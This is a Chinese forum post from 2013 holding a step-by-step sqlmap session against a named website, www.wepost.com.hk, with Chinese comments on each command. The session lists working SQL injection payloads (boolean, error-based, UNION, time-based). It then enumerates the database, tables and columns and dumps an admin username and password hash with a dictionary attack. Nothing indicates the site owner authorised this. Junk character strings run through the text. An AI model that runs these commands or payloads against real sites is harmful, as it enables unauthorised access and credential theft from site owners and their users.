D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
) X. ]8 x2 W4 ~! ^9 D7 s% |ms "Mysql" --current-user /* 注解:获取当前用户名称5 K* g& a7 S9 l0 c
sqlmap/0.9 - automatic SQL injection and database takeover tool
3 O. O$ W8 D5 H2 y) J. {* v http://sqlmap.sourceforge.net starting at: 16:53:542 {8 b: i3 F7 t4 v# h
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
: L5 e: P- ]3 J- y* @ session file
; l; p2 x$ X/ ]8 k* A) `, i[16:53:54] [INFO] resuming injection data from session file% A- `# H9 |1 Q: t) K
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
" K/ U' z i$ `6 _[16:53:54] [INFO] testing connection to the target url
: j m/ {! N- R9 D, A5 E7 Psqlmap identified the following injection points with a total of 0 HTTP(s) reque
; V1 w, R* o4 s- e8 s. K8 nsts:) J6 K9 ]- Q$ G1 Y' g# q! P
---
$ Y+ i! p7 e* yPlace: GET
8 W; u; K# l; K7 S8 cParameter: id. u/ ], q! K+ y0 l( r) S) _
Type: boolean-based blind
) B, y' v* X/ g6 v8 R Title: AND boolean-based blind - WHERE or HAVING clause
' m* @. b! F; {5 ~( d Payload: id=276 AND 799=799
# t. f z3 S6 d' J Type: error-based
: \4 o& F& L2 V% a" Y6 L( x( K7 ] Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause6 |0 E4 H. g1 [' i) F9 [
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
: O2 A7 m; t3 u120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
9 u2 z# x- A( Q! |, n* z),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ Y# ^9 R8 q, g% g( o& [) U3 r
Type: UNION query
+ @5 z- l2 h4 t2 L' ?1 | Title: MySQL UNION query (NULL) - 1 to 10 columns; T3 ^) F' W5 k1 W
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 S- T9 ]! Z+ W(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ B2 V9 C2 v+ B& xCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 C! D; [. P- p0 v8 B% ?$ c0 a. N
Type: AND/OR time-based blind8 {- K/ ] T$ `/ q& L3 E3 s
Title: MySQL > 5.0.11 AND time-based blind
6 z1 g, K7 `7 m4 f+ T Payload: id=276 AND SLEEP(5)7 X9 ]7 c* Z# E a- P- ]7 b1 V
---
- z7 j4 b0 E1 Z! ?3 Y3 ~$ S* x5 N[16:53:55] [INFO] the back-end DBMS is MySQL
+ e$ H b1 h+ y9 sweb server operating system: Windows* c* \2 l8 a5 E0 o2 Q6 J/ N3 ^
web application technology: Apache 2.2.11, PHP 5.3.0
* Z' s8 ]8 Q) q. ^. xback-end DBMS: MySQL 5.0
P, F2 f1 i" o6 q# p: @[16:53:55] [INFO] fetching current user
6 ~7 N3 X% g3 c6 U4 u4 \current user: 'root@localhost'
- U, I; h& v4 g" b f[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
9 g: g3 Q: U; Y( otput\www.wepost.com.hk' shutting down at: 16:53:58+ a7 v: Z) K- }1 b+ Y' K1 E
, M" \/ l% E' ?D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" W. m7 d, z4 J4 w" j
ms "Mysql" --current-db /*当前数据库
' A7 `/ O, J* d5 E9 x" U: l sqlmap/0.9 - automatic SQL injection and database takeover tool& X( Y6 T% s0 H% m3 H- _- b
http://sqlmap.sourceforge.net starting at: 16:54:16
H* ?( n- [" a[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
0 B0 ?; @: G; p, @ N0 o session file
! |8 J/ V) V8 I, U[16:54:16] [INFO] resuming injection data from session file
" h& h; ~5 d5 d2 ^9 @ {[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file8 j# {2 t: Y) p. B9 g# c7 u! B
[16:54:16] [INFO] testing connection to the target url: U2 L2 L! B% y9 M0 A
sqlmap identified the following injection points with a total of 0 HTTP(s) reque3 T+ m9 C: S$ C# U( b
sts:" m6 j: ~9 L4 d1 U0 S
---( ?- ]0 V) V7 g }; P
Place: GET
. I& x( ]5 B; n* Z" g! k1 `& AParameter: id
! v* H3 |+ N6 W7 I( t2 Y Type: boolean-based blind
2 M' `- L& o' i Title: AND boolean-based blind - WHERE or HAVING clause
4 o+ Q9 z" \' p9 L/ |& O, l, t* ] Payload: id=276 AND 799=799
& g0 V, r. @2 W- a6 E Type: error-based. }5 s2 F9 y: d# z( Z" N! t- y
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 B6 \ C6 o) S0 E; b9 m6 ?$ s4 S* d
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% {# M6 U: A: E4 s( L7 O9 s6 S% q
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 w; u) ~' X; O. I: u5 e),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! A9 ?- I. z" w( |+ k8 u3 A Type: UNION query3 r9 ]& r& s+ [' q# U( n
Title: MySQL UNION query (NULL) - 1 to 10 columns0 U- R- O. b6 r
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
# |4 r0 M7 w9 j" B5 Q2 s+ P(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
1 }3 W4 p. S1 ~0 I- S' iCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
' n0 i- S0 a6 `( } Type: AND/OR time-based blind
. ]8 N( C4 @7 ~% x+ j; Y* p Title: MySQL > 5.0.11 AND time-based blind
# s' x0 I- g' `7 k! _9 r' o Payload: id=276 AND SLEEP(5)+ M: b& _/ p' o! H1 J
---7 W' v# j0 p! M& g6 M1 s
[16:54:17] [INFO] the back-end DBMS is MySQL/ C& m6 I1 V+ k$ [" t
web server operating system: Windows7 q( i+ I. @: p. j8 A
web application technology: Apache 2.2.11, PHP 5.3.06 l: \# D2 ?, \
back-end DBMS: MySQL 5.0' A* N/ y! `7 s. g" [& |5 e
[16:54:17] [INFO] fetching current database
4 s7 ~1 j! A- z$ e: Y4 s! W7 r# `current database: 'wepost': F0 @/ K& i2 i' H) j
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou# F9 a' o( p) L2 ~* T+ f ]
tput\www.wepost.com.hk' shutting down at: 16:54:183 V8 \* s: ^. r8 d. @4 R9 Z
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db R$ [2 j6 h) U9 h
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名1 b( o+ A7 k$ P2 E- E) j
sqlmap/0.9 - automatic SQL injection and database takeover tool! C. \# M Q# Q3 Z/ z
http://sqlmap.sourceforge.net starting at: 16:55:25
+ O& ?: D8 b5 W; y2 O9 ]# a[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
. g$ F( z! }8 d9 o; m. }) l session file* F1 j' u- H2 z! A0 j
[16:55:25] [INFO] resuming injection data from session file
( L) r# t2 z B. O9 U[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
" W" L; i3 p; W3 ?# k[16:55:25] [INFO] testing connection to the target url
3 O: h9 u, K% Y. O' Isqlmap identified the following injection points with a total of 0 HTTP(s) reque5 o5 }8 Y" J5 c3 j% O& K; @
sts:% h% {7 c2 E# @& c4 j' k' b. Y
---
3 o; x4 s2 U4 G( k$ `$ I1 d" ?& [Place: GET' O7 a1 i# |! Z M4 C
Parameter: id1 m- y* n9 o0 V7 G
Type: boolean-based blind
' q$ u+ `7 G- t Title: AND boolean-based blind - WHERE or HAVING clause/ n* _# w4 s' N: {, \. K* Q
Payload: id=276 AND 799=799
7 e4 ^+ g: f; ]- b1 c Type: error-based* t% N7 W# E" D r
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause2 I; I* C4 b: J# E$ }- p
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
. ?6 T1 q# {+ E- y) K( x2 T6 Q0 j. B120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,587 i2 P p0 T1 ^9 L( Q3 S t
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)* w0 t* ~! L2 Y, s" _" u
Type: UNION query/ I0 _, n! E6 _4 u
Title: MySQL UNION query (NULL) - 1 to 10 columns
5 W9 L9 j' H4 V' S: n, \" a Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 z. f; @% v5 r
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), ^* ^6 G5 v3 G* \
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#0 _6 K$ v( |8 a- m& N# P+ n; f# k
Type: AND/OR time-based blind
, n' P0 I" s0 G( R- v Title: MySQL > 5.0.11 AND time-based blind8 O& E% }( J" \) Z0 x: G
Payload: id=276 AND SLEEP(5)
! h$ ?9 n, l; n, L: k+ z8 b J---0 v; k0 d G6 R Q
[16:55:26] [INFO] the back-end DBMS is MySQL
`, w! y0 l3 K2 ]web server operating system: Windows
- b% P. O6 I& ^( W3 Pweb application technology: Apache 2.2.11, PHP 5.3.06 _8 V0 R3 `1 r, l
back-end DBMS: MySQL 5.0) _; _" _! E. _ ]! c, [
[16:55:26] [INFO] fetching tables for database 'wepost'. ^1 I0 d5 Y( Z1 l- c! l- R
[16:55:27] [INFO] the SQL query used returns 6 entries
0 `( b3 ^" ^$ s- S2 L7 P0 C, TDatabase: wepost n1 t& H7 I% h: o0 [; W
[6 tables]
2 b% k9 y1 r$ ~ v3 C+-------------+
3 v4 K2 C- h O" X6 m% A| admin |3 q5 q$ b3 r9 L% m
| article |. ^( `# ~5 l6 s+ o9 K
| contributor |/ @" S8 Y8 z2 w+ `% z: {3 W' J$ U# G
| idea |- C# O. c4 f8 {* ^6 J3 B
| image |! m5 h7 `" U- e7 Q
| issue |5 E; Z" d. e, Y5 }8 ~
+-------------+# n6 Y$ `5 d, D. k
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
8 z* }2 L+ z3 t- R4 u8 rtput\www.wepost.com.hk' shutting down at: 16:55:33
& B/ A* n: z( h6 u0 b* K. \
! f3 ~% z, K4 {- fD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
; u1 R' H ] nms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
U+ y; b+ f! s* J9 d+ `4 S sqlmap/0.9 - automatic SQL injection and database takeover tool
0 `& H9 D/ a5 g0 A8 X http://sqlmap.sourceforge.net starting at: 16:56:06: A, J- L' c. P4 b) l, e. I
sqlmap identified the following injection points with a total of 0 HTTP(s) reque) }7 Y4 l& ?% W, i+ T
sts:0 e5 t/ D5 ]+ k& Z' H
---3 E j3 O; r$ \+ u' l+ |
Place: GET
$ f& a1 b; a$ a: FParameter: id
- |! V0 u/ M1 @$ T" x5 x" ^ Type: boolean-based blind3 K. I' e2 D; Y, ^1 [* r, V0 ?" w
Title: AND boolean-based blind - WHERE or HAVING clause" ^4 O/ T# _4 J! h4 y1 t4 d; y
Payload: id=276 AND 799=799
' i" E; g/ K8 Q5 R Type: error-based
, i/ U& t- B9 W# b, p Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
2 H* {/ x# I( Y Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 y X3 E4 q, @
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58: b2 Z( B" s: g3 Y
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); S+ T) ?& r) H* Z
Type: UNION query
7 l0 q: }% t% L% Z- W Title: MySQL UNION query (NULL) - 1 to 10 columns z( ]. F( L, [+ H1 v Y
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
# y) o5 a" E9 i- i- z- i3 w(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
" G5 t* O2 k$ {) ]CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 v7 \6 G( n8 T0 F
Type: AND/OR time-based blind4 u3 A4 d3 P) i
Title: MySQL > 5.0.11 AND time-based blind$ Q$ y* b) U5 V' G# r2 ?* |9 J: N4 z6 B
Payload: id=276 AND SLEEP(5)3 R& X) J; ~- w- K& m' R+ A
---
5 T" ^1 D" g' ~& g4 Y; e4 ` Sweb server operating system: Windows7 d: K& F0 Q2 Z4 A1 |9 H0 b
web application technology: Apache 2.2.11, PHP 5.3.0
$ @, H( W0 ^5 }5 `0 b9 aback-end DBMS: MySQL 5.0 ^/ a# ~! j- b; M
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
" r( N1 D" V% j9 J7 C% |$ `ssion': wepost, wepost
% C, b3 w2 n5 V; U7 sDatabase: wepost
% [! k" m- H2 ^" f3 hTable: admin, W5 z6 b4 \7 q3 b0 J. g
[4 columns]% N+ a; Y2 l9 g
+----------+-------------+
! y; o5 Z9 U* || Column | Type |- z& p5 g0 J; d9 m. M9 T2 d, r6 v
+----------+-------------+4 h* a$ a8 _' J- p, V5 [
| id | int(11) | z3 a4 N" {7 n6 p; x2 Q
| password | varchar(32) |5 Q; K! Y q- ~$ `* U( H
| type | varchar(10) |
7 w; @: I( b' c0 c/ b; }" J; I' k/ B| userid | varchar(20) |
% B' j; F" e* }+----------+-------------+
+ q. `6 e# `' r# L+ d shutting down at: 16:56:19
& Y9 R$ ?; F4 |* P$ K8 J' t8 U; a+ ]( J! T1 @
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
; }- Z4 b j* X2 {( i7 N* F3 f0 Kms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容- g* I! m w8 W4 h! r: F
sqlmap/0.9 - automatic SQL injection and database takeover tool
# C. j( y2 {' W; d5 M1 J http://sqlmap.sourceforge.net starting at: 16:57:14: c$ q J* F. x/ @
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
- n7 @, s2 R2 h. ]7 Ists:5 d+ |$ A) T/ _' Z: q- n! C7 |
---4 ^; \1 v; F( ?( |' s
Place: GET- j$ W9 P/ \! r/ o. @
Parameter: id
9 `8 S2 _9 w8 T, B1 v Type: boolean-based blind, ~# t5 n% P5 _+ l4 z6 p4 @
Title: AND boolean-based blind - WHERE or HAVING clause* l" ^& q4 h/ j# F: `" P# u' t& |
Payload: id=276 AND 799=799
. X! K" E5 b( w( j) l l/ e7 p6 Z" u Type: error-based
" o: _5 F V, \8 o Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
. [" _3 S0 B$ @6 \; ]8 W Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,8 I0 W `/ J x% t
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! ~ Y. Q8 A( q6 C- _' k
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
2 ^, e! w' b$ C% ]) m Type: UNION query
- L( e8 S3 B8 y4 u9 H& { Title: MySQL UNION query (NULL) - 1 to 10 columns O W8 n% J7 f2 G. ^0 f& i
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
: f, k1 k/ `) ?- M+ x4 g+ q(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
$ r1 G6 e# A7 l' x: P( VCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. _$ ]4 A* w9 `8 |
Type: AND/OR time-based blind
/ v/ |& l& R$ R Title: MySQL > 5.0.11 AND time-based blind) Q! T! Z. k9 ]
Payload: id=276 AND SLEEP(5)
7 |# I) ?* Y1 P g/ Y---) @2 R; g5 B8 ~1 `. S: T0 u
web server operating system: Windows* f1 F- r! m0 @
web application technology: Apache 2.2.11, PHP 5.3.0$ k8 i) A0 j5 x8 e! {% C" k! o
back-end DBMS: MySQL 5.09 N" u2 A7 N8 Z' U
recognized possible password hash values. do you want to use dictionary attack o4 o+ a, f- D4 d* ~) o- i
n retrieved table items? [Y/n/q] y2 r# k( y* h3 i& g2 @" Y5 B
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
' q' q/ q Z+ k' Vdo you want to use common password suffixes? (slow!) [y/N] y4 J5 x) Z$ M$ P' D& Q0 s
Database: wepost
) _+ l" Q |# ]3 CTable: admin. q& W$ T5 p$ _" Z6 L. A: V# y
[1 entry]" M5 l3 Y1 u: @5 i, q
+----------------------------------+------------+, D& A' \! \" U; q
| password | userid |
0 I$ D! w, p" T& `+----------------------------------+------------+
$ v! B1 G5 N* y& T1 r }, s/ Y| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |" }) U+ l9 d& [8 t5 U# Q' W
+----------------------------------+------------+0 R$ N% v9 ~! n/ ^ ]
shutting down at: 16:58:14
+ E8 o" t! j. f" J% N) H% V* ]8 D( ^& a) {* Y
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
分享
支持
反对